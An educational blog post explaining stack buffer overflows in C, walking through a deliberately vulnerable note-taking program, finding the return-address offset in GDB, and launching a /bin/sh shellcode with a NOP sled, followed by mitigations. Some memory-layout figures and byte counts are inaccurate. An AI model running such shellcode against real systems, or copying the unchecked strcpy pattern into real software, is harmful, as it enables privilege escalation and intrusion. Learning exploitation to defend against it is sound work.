Buffer Overflow and Exploitation
Buffer overflows are as old as the world itself. Even though it is not that fresh, it is still one of the most exploited vulnerabilities that can often lead to other vulnerabilities. When I was younger, I was originally taught how to code in C, the language that is infamous for not being memory-safe and in this article, I would like to leverage these previous experiences to introduce you to the world of buffer overflow.
Before we start to talk about buffer overflow, we should first understand how memory works. Imagine you have a bookshelf where you store your books. The bookshelf itself represents the buffer in which we are inserting the books. Each slot on the shelf is designed to hold one book. You've planned to put exactly 10 books on this shelf. If you try to stuff more than 10 books into those slots, books will start to fall out, or even push other books out of their designated places.
In computer terms, that bookshelf is like a block of memory allocated for storing data, and each book is a piece of data. If you write more data than the memory can hold, it will "overflow" into adjacent memory areas.
When the developers write code, they specify how much memory (ie. how many "slots" on the bookshelf) they will need. A buffer overflow vulnerability occurs when the code doesn't properly check how much data (or how many "books") is being put into that memory. If someone (often a malicious attacker) tries to stuff more data into the memory then it can overwrite adjacent memory areas. This can cause the program to behave unexpectedly, crash, or in the worst-case scenario allow the attacker to execute their malicious code. So, a buffer overflow is like overstuffing a bookshelf, causing chaos and sometimes letting bad actors rearrange your books to tell their own story.
Buffer and memory visualization
Now that we understand what the buffer is, let's talk about how it functions. In C language, the buffer is simply an array of a certain data type. We can create a simple buffer that will hold 8 characters like this:
char buffer[8];
We can imagine the buffer as one block (also known as a stack frame) that consists of 8 smaller blocks. The whole memory is created by these smaller blocks that are being allocated by the applications and processes that run on our systems.
+----------------+
| ... |
+----------------+
| buffer[8] |
+----------------+
| ... |
+----------------+
| buffer[1] |
+----------------+
| buffer[0] |
+----------------+
| ... |
+----------------+
Memory addressing and important pointers/registers
Each memory slot has a hexadecimal address associated with it. Memory addresses increase as we go up so for our buffer (bookshelf) it is from address 0x1000 to 0x102C (8 characters). Within the stack frame, there are also some interesting registers/pointers which we will talk about later. We can use pointers to refer to important points within the stack to not have to have to remember the hexadecimal addresses.
+-----------------------------------------------------+
| Address: 0x1040 | ... | <- Top of memory
+-----------------------------------------------------+
| Address: 0x103C | ... |
+-----------------------------------------------------+
| Address: 0x1038 | EIP | <- EIP
+-----------------------------------------------------+
| Address: 0x1034 | RET | <- Return Address
+-----------------------------------------------------+
| Address: 0x1030 | EBP | <- EBP
+-----------------------------------------------------+
| Address: 0x102C | buffer[7] |
+-----------------------------------------------------+
| Address: 0x1028 | buffer[6] |
+-----------------------------------------------------+
| Address: 0x1024 | buffer[5] |
+-----------------------------------------------------+
| Address: 0x1020 | buffer[4] |
+-----------------------------------------------------+
| Address: 0x101C | buffer[3] |
+-----------------------------------------------------+
| Address: 0x1018 | buffer[2] |
+-----------------------------------------------------+
| Address: 0x1014 | buffer[1] |
+-----------------------------------------------------+
| Address: 0x1010 | buffer[0] | <- ESP
+-----------------------------------------------------+
| Address: 0x100C | ... | <- Bottom of memory
+-----------------------------------------------------+
You might be wondering what ESP, EBP and EIP mean. Let's take a look:
EBP (Base Pointer) points to the bottom of the current stack and does not change
ESP (Stack Pointer) keeps the current top of the stack
EIP (Instruction Pointer) points to the next instruction to be executed after the function finishes
There is also a RET (Return address) pointer to which an EIP is set after the function finishes running. By cleverly overwriting this value, we can make sure to execute some of our mischievous code.
Vulnerable application
Now that we know what the buffers are and how to create one, let's take a look at this innocent note-taking application which only has the simple functionality of letting the user take notes. As we can see, the function createNote()
takes the given input and moves it into a buffer that should be then stored in the file.
void createNote(char *note) {
char buffer[400];
strcpy(buffer, note);
FILE *f = fopen("note.txt", "w");
if (f != NULL) {
fprintf(f, buffer);
}
fclose(f);
}
int main(int argc, char* argv[]) {
if (argc == 2) {
createNote(argv[1]);
}
return 0;
}
Let's visualize the buffer used by this function.
+-----------------------------+
| ... |
+-----------------------------+
| Address: ??? | Return Address to main | <- EIP would be set to this upon return
+-----------------------------+
| Address: ???-4 | Saved EBP (from main) | <- Old EBP
+-----------------------------+ <- New EBP (for createNote)
| Address: ???-8 | buffer[399] |
| ... | ... |
| Address: ???-1604 | buffer[0] |
+-----------------------------+
| Address: ???-1608 | FILE *f |
+-----------------------------+
| Address: ???-1612 | ... | <- Other local variables, padding, etc.
+-----------------------------+
| Address: ???-??? | ... | <- ESP will change as function calls occur
+-----------------------------+
From this visualization, we can see that the buffer can store 400 characters, but the issue with strcpy()
function is that it doesn't check the size of the data we are trying to pass. If we try to pass more than 400 elements, we would naturally overwrite the buffer.
Where is Waldo? I mean... where is EIP?
Great! We already have a vulnerable application present within our system. The next step is to find the location of EIP because it doesn’t have to be located right after buffer and EBP. For this, we can use GDB which is a debugger used mainly for C and C++ code. I will use Python to create inputs that help me map the stack. My goal is to send an input (payload) that would be of (buffer + EBP + EIP) length. If the input has a different length, the program will exit with a Segmentation fault.
gdb -q --args ./noteplusplus `python -c 'print "A" * 412 + "BCDE"'`
After some testing, I have discovered that my buffer has a length of 416 bytes with the buffer and EBP taking 412 bytes and EIP occupying the last four bytes. The reason behind appending the string "BCDE"
is its hexadecimal representation. It translates to the values 42
, 43
, 44
and 45
that we can easily spot in the debugger. To better visualize the stack, you can use the x/32z $esp
command within the debugger which will display the memory in the blocks of 32 bytes and it will also jump straight to the beginning of the stack (pointer ESP points to the top of the stack). Hit the Enter key to keep scrolling until you see a sequence of 0x41414141
which represents the letters A. After some time, you should be able to see a single cell containing a 0x45444342
value (in little endian, this value represents the BCDE
string).
In my case, I was able to retrieve this address:
0xffffac50: 0x41414141 0x41414141 0x41414141 0x45444342
Shall we use Shellcodes?
In the previous example, we have filled the stack with arbitrary values. What if we used some (perhaps harmful) instructions? The Shellcodes enter the picture at this point. Shellcode is a small piece of code (representing instructions) that is frequently used as a payload for exploitation. There is a large database of shellcodes used for educational purposes available at shell-storm.org. I am going to select the one that opens a shell.
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\
At the end of our shellcode, we have to append the return address to a place in our stack. We would like the address to point at the beginning of the stack (the address that you got by calling x/32z $esp
in the gdb). This return address written in the reverse order will rewrite the value in the EIP register.
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh + \50\x4\xff\xff
We have all the necessary parts set up. The only thing remaining is to set up the attack string which will be passed as a parameter to our vulnerable application. To create an attack string, we have to do some calculations.
We know that the buffer has a size of 412 bytes
Our shellcode has 53 bytes
412 – 53 = 359 which means that we have to fill the buffer with 359 bytes of arbitrary nonsense
As the “arbitrary nonsense,” we can use the NOP
(No operation) instruction which has the hexadecimal value of 0x90
(for Intel 64bit architecture, it is different for other systems). With this knowledge, we can call our program like this:
./noteplusplus `python -c 'print "\x90" * 359 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\50\x4\xff\xff'"`
And open a shell using the vulnerable Note++ application. This can be particularly problematic if the system has misconfigured the SUID/GUID bits allowing to open the shell with higher privileges.
Are there any protections?
Of course, there are a lot of ways to protect against buffer overflow. The first would be to switch from strcpy()
to strncpy()
that limits the amount of data that could be inserted into the buffer. The other option would be to incorporate SC, DEC and ASLR protections. We could also use a scanner (like Snyk Code) to help us find and prevent issues like these.
SC (Stack Canary) uses a secret value that is located somewhere in the stack. This value changes every time we run a program. Before a function returns, the value is checked and if it appears to be modified, the program exits.
DEC (Data Execution Prevention) protects the system from executing the code that is located in the memory space that should not contain executable instructions
ASLR (Address Space Layout Randomization) modifies the system so that every time we run a program, it will be assigned a unique starting address
If you have read so far, you might want to follow me here on Hashnode. Feel free to connect with me over at LinkedIn or Mastodon.
Subscribe to my newsletter
Read articles from Hung Ngo directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
Hung Ngo
Hung Ngo
Humorous, unique, nerdy genius who loves coding, cybersecurity, cats, and pancakes. I occasionally share my passion with others via blog posts.